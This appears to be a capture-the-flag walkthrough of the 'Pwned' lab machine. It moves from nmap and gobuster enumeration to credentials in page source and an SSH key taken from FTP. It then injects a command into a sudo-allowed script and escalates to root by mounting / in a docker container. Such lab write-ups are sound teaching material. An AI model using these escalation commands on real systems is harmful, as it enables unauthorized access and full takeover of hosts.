Initial Enumeration and User Shell

I started the enumeration by running a port scan using nmap to look for open ports and default scripts.

┌──(madhav㉿anton)-[~/Documents/hmv/pwned]
└─$ nmap -sC -sV -oN nmap/initial 192.168.1.2                                                                                             
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-13 15:43 IST
Nmap scan report for 192.168.1.2
Host is up (0.0013s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.34 seconds

We have three different ports open. I started the enumeration with port 80. So Let's open our web browser and see what's running on port 80.

There was nothing interesting on the home page, So I performed a gobuster scan to look for hidden files and directories.

┌──(madhav㉿anton)-[~/Documents/hmv/pwned]                                                                                                     
└─$ gobuster dir -u http://192.168.1.2 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt                                    
===============================================================                                                                                
Gobuster v3.1.0                                                                                                                                
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)                                                                                  
===============================================================                                                                                
[+] Url:                     http://192.168.1.2                                                                                                
[+] Method:                  GET                                                                                                               
[+] Threads:                 10                                                                                                                
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt                                                 
[+] Negative Status codes:   404                                                                                                               
[+] User Agent:              gobuster/3.1.0                                                                                                    
[+] Timeout:                 10s
===============================================================
2020/12/13 15:44:09 Starting gobuster in directory enumeration mode
===============================================================
/nothing              (Status: 301) [Size: 312] [--> http://192.168.1.2/nothing/]
/server-status        (Status: 403) [Size: 276]                                   
/hidden_text          (Status: 301) [Size: 316] [--> http://192.168.1.2/hidden_text/]
                                                                                      
===============================================================
2020/12/13 15:45:09 Finished
===============================================================

We have to two interesting directories, the /nothing directory did not contain anything useful but /hidden_text is a directory listing and I found a wordlist named secret.dic

I downloaded the secret.dic and again performed a gobuster scan using this wordlist.

┌──(madhav㉿anton)-[~/Documents/hmv/pwned]
└─$ gobuster dir -u http://192.168.1.2 -w secret.dic                                                       
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                secret.dic
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2020/12/13 15:45:52 Starting gobuster in directory enumeration mode
===============================================================
//pwned.vuln          (Status: 301) [Size: 315] [--> http://192.168.1.2/pwned.vuln/]
                                                                                    
===============================================================
2020/12/13 15:45:52 Finished
===============================================================

We found another directory named /pwned.vuln. It contains a login page, and looking at the source code we can see login credentials.

I used these credentials to login via FTP and found a directory named share. Inside the directory, there were two files named id_rsa and note.txt. I download both of them to my local machine.

The id_rsa contains the private RSA key for some user but we don't know the username. That was not difficult to guess, it was present the note.txt :)

┌──(madhav㉿anton)-[~/Documents/hmv/pwned]
└─$ cat note.txt

Wow you are here 

ariana won't happy about this note 

sorry ariana :(

We can now login as user ariana via SSH using the private RSA key and read our first flag.

┌──(madhav㉿anton)-[~/Documents/hmv/pwned]
└─$ ssh -i id_rsa ariana@192.168.1.2
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70

ariana@pwned:~$ ls
ariana-personal.diary  user1.txt
ariana@pwned:~$ wc -c user1.txt
143 user1.txt

Next, I used sudo -l command and found that user ariana can run a script present in the home directory as user selena

ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh

Next, I enumerated the /home/messenger.sh and found that this script executes the vaule we enter for $msg

ariana@pwned:~$ cat /home/messenger.sh 
#!/bin/bash

clear
echo "Welcome to linux.messenger "
                echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
                echo ""
echo "$users"
                echo ""
read -p "Enter username to send message : " name 
                echo ""
read -p "Enter message for $name :" msg
                echo ""
echo "Sending message to $name "

$msg 2> /dev/null
                echo ""
echo "Message sent to $name :) "
                echo ""

So, first I executed the script using the following command:

ariana@pwned:~$ sudo -u selena /home/messenger.sh

After that, I typed and bash in both the fields and I got a shell as user selena

Welcome to linux.messenger 


ariana:
selena:
ftpuser:

Enter username to send message : bash

Enter message for bash :bash

Sending message to bash 
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)

Now we can read our second flag present in the home directory.

python3 -c 'import pty;pty.spawn("/bin/bash")'
selena@pwned:~$ ls
selena-personal.diary  user2.txt
selena@pwned:~$ wc -c user2.txt
100 user2.txt

Also, by executing the id command, I found that this user is added to the docker group. We can get a root shell my mounting the / directory to a docker container. I searched on GTFO Bins and found the exact command.

selena@pwned:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)

We are now root and can read our final flag present in /root directory.

# cd /root
# cat root.txt

You found me. i dont't expect this (◎ . ◎)

I am Ajay (Annlynn) i hacked your server left and this for you.

I trapped Ariana and Selena to takeover your server :)


You Pwned the Pwned congratulations :)

share the screen shot or flags to given contact details for confirmation 

Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm   ajs_walker 

Twitter    Ajs_walker

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Akshar Pathak.